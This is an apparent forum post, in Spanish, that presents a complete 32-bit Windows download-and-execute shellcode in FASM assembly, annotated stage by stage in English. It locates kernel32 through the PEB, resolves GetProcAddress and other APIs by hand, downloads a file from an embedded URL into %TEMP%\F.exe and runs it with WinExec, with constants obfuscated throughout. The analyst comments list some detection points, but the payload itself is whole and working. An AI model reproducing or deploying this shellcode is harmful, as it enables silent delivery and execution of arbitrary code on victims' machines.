Hice un ShellCode, ensamblado con FASM.
El ShellCode en sí está muy mal programado.

Pesa 643 bytes; como no quiero usar el mismo que usa el público, no publico la versión "perfeccionada".

Exploit:
; ---------------------------------------------------------------------------
; Analyst notes (review). 32-bit Windows download-and-execute shellcode, FASM
; syntax, position independent (addresses are recovered with jmp/call/pop).
; Stages, as written below:
;   1. Walk the PEB (fs:[0x30] -> Ldr -> InInitializationOrderModuleList) and
;      stop at the first module whose UTF-16 base name has "32" at characters
;      6-7, i.e. kernel32.dll; edx = its DllBase.
;   2. Parse kernel32's export directory by hand and locate the export whose
;      name starts with "GetProcAddre"; ebx = GetProcAddress.
;   3. Resolve LoadLibraryA, GlobalAlloc, GetEnvironmentVariableA and WinExec
;      from kernel32, load urlmon.dll and resolve URLDownloadToFileA.
;   4. Build "%TEMP%\F.exe", download the URL embedded below into it, WinExec it.
; Every inline string is stored with a trailing byte of 1 that is patched to 0
; at run time (dec byte[...]) before use, so the code writes into its own
; bytes: it only runs from memory that is both writable and executable, and a
; W^X policy on the host process faults it at the first patch.
; Detection points: fs:[0x30] PEB walk, export-table scan for "GetProcAddre",
; urlmon!URLDownloadToFileA writing under %TEMP%, WinExec of that file.
; Constants are encoded as NOT imm / NOT reg pairs throughout.
; Register roles after stage 2: edx and edi = kernel32 base, ebx = GetProcAddress.
; ---------------------------------------------------------------------------
use32
; --- Stage 1: kernel32 base via the PEB loader list ---
xor eax,eax
mov al,0x30                     ; eax = 0x30
MOV ESI,DWORD[fs:eax]           ; esi = TEB->ProcessEnvironmentBlock (PEB)
MOV ESI,DWORD [ESI+0xC]         ; esi = PEB->Ldr (PEB_LDR_DATA)
MOV ESI,DWORD [ESI+0x1C]        ; esi = Ldr->InInitializationOrderModuleList.Flink
.bucle:                         ; for each module, in initialisation order
MOV EDX,DWORD [ESI+0x8]         ; edx = entry->DllBase
MOV EDI,DWORD [ESI+0x20]        ; edi = entry->BaseDllName.Buffer (UTF-16)
MOV ESI,DWORD [ESI]             ; esi = next entry (advanced before the test)
mov eax,NOT 0x320033
not eax                         ; eax = 0x00320033 = UTF-16 "32"
CMP DWORD[EDI+0xC],eax          ; name characters 6-7 == "32" ? (kernel32.dll)
JNZ .bucle
; edx = kernel32 DllBase from here on
; --- Stage 2: locate GetProcAddress in kernel32's export table ---
mov edi,edx
mov edi,dword[edi+0x3C]         ; e_lfanew
add edi,edx                     ; edi = IMAGE_NT_HEADERS
xor ecx,ecx
mov cl,0x78                     ; 0x78 = DataDirectory[EXPORT].VirtualAddress
mov esi,dword[edi+ecx]
add esi,edx                     ; esi = IMAGE_EXPORT_DIRECTORY
mov eax,[0x20+esi]
add eax,edx                     ; eax = AddressOfNames (RVA -> VA)
mov ebx,eax
push esi                        ; save export directory
mov esi,[0x18+esi]              ; esi = NumberOfNames, used as a down-counter
push ebx                        ; save AddressOfNames
xor ecx,ecx
Api:                            ; new local-label scope for .bucle
.bucle:
dec esi                         ; esi = candidate name index
mov eax,esi
rol eax,2                       ; eax = index*4 (rol == shl for small indices)
mov eax,[ebx + eax]
add eax,edx                     ; eax = export name string
cmp dword[eax],'GetP'
jne .bucle
cmp dword[eax+4],'rocA'
jne .bucle
cmp dword[eax+8],'ddre'         ; only the first 12 bytes are compared
jne .bucle
mov ecx,esi                     ; ecx = matching name index
pop ebx                         ; (AddressOfNames, no longer needed)
pop esi                         ; esi = export directory
mov eax,[0x24+esi]
add eax,edx                     ; eax = AddressOfNameOrdinals
movzx ecx, word[eax + 2*ecx]    ; ecx = ordinal of GetProcAddress
mov eax, [esi + 0x1c]
add eax,edx                     ; eax = AddressOfFunctions
mov eax, [eax + 4 * ecx]
add eax, edx                    ; eax = GetProcAddress
mov ebx,eax                     ; ebx = GetProcAddress
mov edi,edx                     ; edi = kernel32 base
; --- Stage 3: resolve APIs by name. Every block below repeats one pattern:
;     jmp .call / call .second / pop eax leaves the address of .pop in eax;
;     eax += (12 code bytes + string bytes) jumps over the inline string;
;     the string's trailing 1 is then patched to 0 in place and the string is
;     handed to GetProcAddress(kernel32, name). Each _N label opens a fresh
;     local-label scope so .call/.second/.pop can be reused verbatim.
@@:
jmp .call
.second:
jmp .pop
.call:
call .second                    ; pushes address of .pop
.pop:
pop eax                         ; eax = address of .pop
mov edx,NOT 25
NOT edx                         ; edx = 25 = 12 code bytes + 13 string bytes
add eax,edx
jmp eax                         ; resume after the string
db "LoadLibraryA",1             ; 12 chars + placeholder terminator
sub al,13                       ; eax -> "LoadLibraryA" (8-bit arithmetic only)
mov ecx,eax
add cl,12                       ; cl -> placeholder byte
dec byte[ecx]                   ; patch 1 -> 0 (write into own code)
sub cl,12                       ; ecx -> "LoadLibraryA"
push ecx                        ; lpProcName
push edi                        ; hModule = kernel32
call ebx                        ; GetProcAddress
mov esi,eax                     ; esi = LoadLibraryA
mov edx,eax
push edx
_2:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax                         ; eax = address of .pop
mov edx,NOT 24
NOT edx                         ; edx = 24 = 12 code bytes + 12 string bytes
add eax,edx
jmp eax
db "GlobalAlloc",1
sub al,12                       ; eax -> "GlobalAlloc"
mov ecx,eax
add cl,11
dec byte[ecx]                   ; patch terminator
push edx                        ; scratch; popped again after GlobalAlloc
sub cl,11                       ; ecx -> "GlobalAlloc"
push ecx                        ; lpProcName
push edi                        ; kernel32
call ebx                        ; GetProcAddress -> eax = GlobalAlloc
mov ecx,NOT 260
not ecx                         ; dwBytes = 260 (MAX_PATH)
push ecx
mov ecx,NOT 0x0040
not ecx                         ; uFlags = 0x40 (GMEM_ZEROINIT)
push ecx
call eax                        ; GlobalAlloc(0x40, 260) -> eax = buffer
pop edx                         ; discard the scratch push above
pushad                          ; save all registers (eax = buffer)
mov esi,eax                     ; esi = buffer
_3:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax                         ; eax = address of .pop
mov edx,NOT 36
NOT edx                         ; edx = 36 = 12 code bytes + 24 string bytes
add eax,edx
jmp eax
db "GetEnvironmentVariableA",1
dec eax                         ; eax -> placeholder byte
dec byte[eax]                   ; patch 1 -> 0
sub eax,23                      ; eax -> "GetEnvironmentVariableA"
push eax                        ; lpProcName
push edi                        ; kernel32
call ebx                        ; GetProcAddress -> eax = GetEnvironmentVariableA
mov ecx,NOT 260
NOT ECX
push ecx                        ; nSize = 260
push esi                        ; lpBuffer = buffer
push eax                        ; function pointer, popped back into eax below
_4:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax                         ; eax = address of .pop
mov edx,NOT 17
NOT edx                         ; edx = 17 = 12 code bytes + 5 string bytes
add eax,edx
jmp eax
db "TEMP",1
dec eax                         ; eax -> placeholder byte
dec byte[eax]                   ; patch 1 -> 0
sub eax,4                       ; eax -> "TEMP"
mov ecx,eax
pop eax                         ; eax = GetEnvironmentVariableA
push ecx                        ; lpName = "TEMP"
call eax                        ; GetEnvironmentVariableA("TEMP", buffer, 260)
popad                           ; restore registers; eax = buffer again
mov ebp,eax                     ; ebp = buffer holding the %TEMP% path
_1:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax                         ; eax = address of .pop
mov edx,NOT 23
NOT edx                         ; edx = 23 = 12 code bytes + 11 string bytes
add eax,edx
jmp eax
db "urlmon.dll",1
sub al,11                       ; eax -> "urlmon.dll"
mov ecx,eax
add cl,10
dec byte[ecx]                   ; patch terminator
sub cl,10                       ; ecx -> "urlmon.dll"
push ecx                        ; lpLibFileName
call esi                        ; LoadLibraryA("urlmon.dll")
mov esi,eax                     ; esi = urlmon base
mov ecx,ebp                     ; ecx = %TEMP% buffer
xor edx,edx                     ; dh = 0, used as the NUL to search for
.bucle:
inc ecx
cmp byte[ecx],dh                ; find the end of the %TEMP% string
jne .bucle
mov byte[ecx],'\'               ; append "\"
inc ecx
mov dword[ecx],'F.ex'           ; append "F.ex"
mov ax,NOT 0x0065
NOT ax                          ; ax = 'e',0
mov word[ecx+4],ax              ; buffer = "%TEMP%\F.exe",0
_6:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax                         ; eax = address of .pop
mov edx,NOT 31
NOT edx                         ; edx = 31 = 12 code bytes + 19 string bytes
add eax,edx
jmp eax
db "URLDownloadToFileA",1
sub al,19                       ; eax -> "URLDownloadToFileA"
mov ecx,eax
add cl,18
dec byte[ecx]                   ; patch terminator
push eax                        ; lpProcName
push esi                        ; hModule = urlmon
call ebx                        ; GetProcAddress -> eax = URLDownloadToFileA
mov esi,eax                     ; esi = URLDownloadToFileA
xor edx,edx
push edx                        ; lpfnCB = NULL
push edx                        ; dwReserved = 0
push ebp                        ; szFileName = "%TEMP%\F.exe"
_7:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax                         ; eax = address of .pop
mov edx,NOT finurl
NOT edx                         ; edx = finurl = 12 code bytes + URL bytes
add eax,edx
jmp eax
url :
db "http://foro.elhacker.net/Themes/converted/selogo.jpg",1
finurl = $ -url + 12            ; URL bytes (incl. placeholder) + 12 code bytes
dec eax                         ; eax -> placeholder byte
dec byte[eax]                   ; patch 1 -> 0
xor edx,edx
mov dx,NOT finurl
NOT dx                          ; dx = finurl
sub dl,13                       ; edx = URL length (finurl - 12 - 1)
sub eax,edx                     ; eax -> start of the URL
push eax                        ; szURL
xor edx,edx
push edx                        ; pCaller = NULL
;int 3
call esi                        ; URLDownloadToFileA(NULL, url, "%TEMP%\F.exe", 0, NULL)
_8:
jmp .call
.second:
jmp .pop
.call:
call .second
.pop:
pop eax                         ; eax = address of .pop
mov edx,NOT 20
NOT edx                         ; edx = 20 = 12 code bytes + 8 string bytes
add eax,edx
jmp eax
db "WinExec",1
dec eax                         ; eax -> placeholder byte
dec byte[eax]                   ; patch 1 -> 0
sub al,7                        ; eax -> "WinExec"
push eax                        ; lpProcName
push edi                        ; kernel32
call ebx                        ; GetProcAddress -> eax = WinExec
xor ecx,ecx
inc ecx                         ; uCmdShow = 1 (SW_SHOWNORMAL)
push ecx
push ebp                        ; lpCmdLine = "%TEMP%\F.exe"
call eax                        ; WinExec(path, SW_SHOWNORMAL)
;int 3
ret